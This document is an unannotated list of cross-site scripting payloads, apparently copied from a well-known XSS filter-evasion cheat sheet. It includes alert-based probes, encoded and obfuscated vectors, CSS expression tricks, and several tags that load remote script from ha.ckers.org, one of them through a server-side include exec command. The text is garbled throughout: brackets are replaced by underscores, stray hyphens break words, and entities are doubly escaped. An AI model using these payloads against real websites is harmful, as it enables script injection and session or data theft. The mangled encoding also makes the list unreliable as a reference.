_"';alert(String.fromCharCode(88,83,83))//\';alert(- String.fromCharCode(88,83,83))//";alert(String.fromChar- Code(88,83,83))//\";alert(String.fromCharCode(88,83,83)- )//--__/SCRIPT_"_'__SCRIPT_alert(String.fromCharCode(88- ,83,83))_/SCRIPT_
_META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydC- gnWFNTJyk8L3NjcmlwdD4K"_
_IFRAME SRC="javascript:alert('XSS');"__/IFRAME_
_EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0- dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My- 5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5- L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhl- aWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxl- cnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"__/EMBED_
_SCRIPT a="_" SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT a="_" '' SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT "a='_'" SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT a="_'_" SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT_document.write("_SCRI");_/SCRIPT_PT SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
__SCRIPT_alert("XSS");//__/SCRIPT_
_"';alert(String.fromCharCode(88,83,83))//\';alert(- String.fromCharCode(88,83,83))//";alert(String.fromChar- Code(88,83,83))//\";alert(String.fromCharCode(88,83,83)- )//--__/SCRIPT_"_'__SCRIPT_alert(String.fromCharCode(88- ,83,83))_/SCRIPT_
';alert(String.fromCharCode(88,83,83))//\';alert(String.- fromCharCode(88,83,83))//";alert(String.fromCharCode(88- ,83,83))//\";alert(String.fromCharCode(88,83,83))//--__- /SCRIPT_"_'__SCRIPT_alert(String.fromCharCode(88,83,83)- )_?/SCRIPT_&submit.x=27&submit.y=9&cmd=search
_script_alert("hellox worldss")_/script_&safe=high&cx=006665157904466- 893121:su_tzknyxug&cof=FORID:9#510
_script_alert("XSS");_/script_&search=1
0&q=';alert(String.fromCharCode(88,83,83))//\';alert- %2?8String.fromCharCode(88,83,83))//";alert(String.from- CharCode?(88,83,83))//\";alert(String.fromCharCode(88,8- 3,83)%?29//--__/SCRIPT_"_'__SCRIPT_alert(String.fromCha- rCode(88,83%?2C83))_/SCRIPT_&submit-frmGoogleWeb=Web+Sea- rch
_h1__font color=blue_hellox worldss_/h1_
_BODY ONLOAD=alert('hellox worldss')_
_input onfocus=write(XSS) autofocus_
_input onblur=write(XSS) autofocus__input autofocus_
_body onscroll=alert(XSS)__br__br__br__br__br__br_..._br__br__br__- br__input autofocus_
_form__button formaction="javascript:alert(XSS)"_lol
_!--_img src="--__img src=x onerror=alert(XSS)//"_
_![__img src="]__img src=x onerror=alert(XSS)//"_
_style__img src="_/style__img src=x onerror=alert(XSS)//"_
_? foo="__script_alert(1)_/script_"_
_! foo="__script_alert(1)_/script_"_
_/ foo="__script_alert(1)_/script_"_
_? foo="__x foo='?__script_alert(1)_/script_'_"_
_! foo="[[[Inception]]"__x foo="]foo__script_alert(1)_/script_"_
_% foo__x foo="%__script_alert(123)_/script_"_
_div style="font-family:'foo ;color:red;';"_LOL-
LOL_style_*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*I- E,Safari*[0]/color:green;color:bl/*IE*/ue;}_/style_
_script_({0:#0=alert/#0#/#0#(0)})_/script_
_svg xmlns="http://www.w3.org/2000/svg"_LOL_script_aler- t(123)_/script__/svg_
<SCRIPT>alert(/XSS/.source)<- ;/SCRIPT>
\\";alert('XSS');//
</TITLE><SCRIPT>alert(\"- ;XSS\");</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"><- br />
<BODY BACKGROUND=\"javascript:alert('XSS')\"&am- p;gt;
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC=\"javascript:alert('XSS')\">- ;
<IMG LOWSRC=\"javascript:alert('XSS')\">- ;
<BGSOUND SRC=\"javascript:alert('XSS');\"><- br />
<BR SIZE=\"&{alert('XSS')}\">
<LAYER SRC=\"http://ha.ckers.org/scrip- tlet.html\"></LAYER>
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">-
<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss&- amp;#46;css\">
<STYLE>@import'http://ha.c- kers.org/xss.css';</STYLE>
<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers&#- 46;org/xss.css>; REL=stylesheet\">
<STYLE>BODY{-moz-binding:url(\&quo- t;http://ha.ckers.org/xssmoz.- ;xml#xss\")}</STYLE>
<XSS STYLE=\"behavior: url(xss.htc);\">
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}<- ;/STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox(\"XSS\")'>
<IMG SRC=\"mocha:[code]\"&g- t;
<IMG SRC=\"livescript:[code]\"- >
˛scriptualert(EXSSE)˛/scriptu
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"- ;>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwd- D5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\&q- uot;
<IFRAME SRC=\"javascript:alert('XSS');\">&- amp;lt;/IFRAME>
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\">&- amp;lt;/FRAMESET>
<TABLE BACKGROUND=\"javascript:alert('XSS')\"&am- p;gt;
<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\"&am- p;gt;
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"background-image:\0075\0072\006C\0028'\- 006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\- 006c\0065\0072\0074\0028.1027\0058.1053\0053- \0027\0029'\0029\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"width: expression(alert('XSS'));\">
<STYLE>@im\port'\ja\vasc\ript:aler- t(\"XSS\")';</STYLE>
<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\&qu- ot;>
<XSS STYLE=\"xss:expression(alert('XSS'))\"&- ;gt;
exp/*<A STYLE='no\xss:noxss(\"*//*\");
xss:ex/*XSS*//*/*/pression(alert(\"- ;XSS\"))'>
<STYLE TYPE=\"text/javascript\">alert('XSS');&- lt;/STYLE>
<STYLE>.XSS{background-image&#- 58;url(\"javascript:alert('XSS')\");}&- ;lt;/STYLE><A CLASS=XSS></A>
<STYLE type=\"text/css\">BODY{background:u- rl(\"javascript:alert('XSS')\")}</- STYLE>
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT&g- t;
<![endif]-->
<BASE HREF=\"javascript:alert('XSS');//\"&g- t;
<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scri- ptlet.html\"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&a- mp;gt;<param name=url value=javascript:alert('XSS')></OBJEC- T>
<EMBED SRC=\"http://ha.ckers.org/xss&a- mp;#46;swf\" AllowScriptAccess=\"always\"></EMBED- >
<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczp- zdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My- 5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5- L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhl- aWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxl- cnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED- >
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers- 6;org/xss.htc\"><xss:xss&- amp;gt;XSS</xss:xss></HTML&- gt;
<XML ID=I><X><C><!&- #91;CDATA[<IMG SRC=\"javas]]><![- CDATA[cript:alert('XSS');\">&- ;#93;]>
</C></X></xml>- <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID=\"xss\"><I><B&g- t;<IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></- B></I></XML>
<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>-
<XML SRC=\"xsstest.xml\" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>
<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\&qu- ot;>
<?import namespace=\"t\" implementation=\"#default#time2\">
<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT&a- mp;gt;\">
</BODY></HTML>
<SCRIPT SRC=\"http://ha.ckers.org/xss&a- mp;#46;jpg\"></SCRIPT>
<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.- js></SCRIPT>'\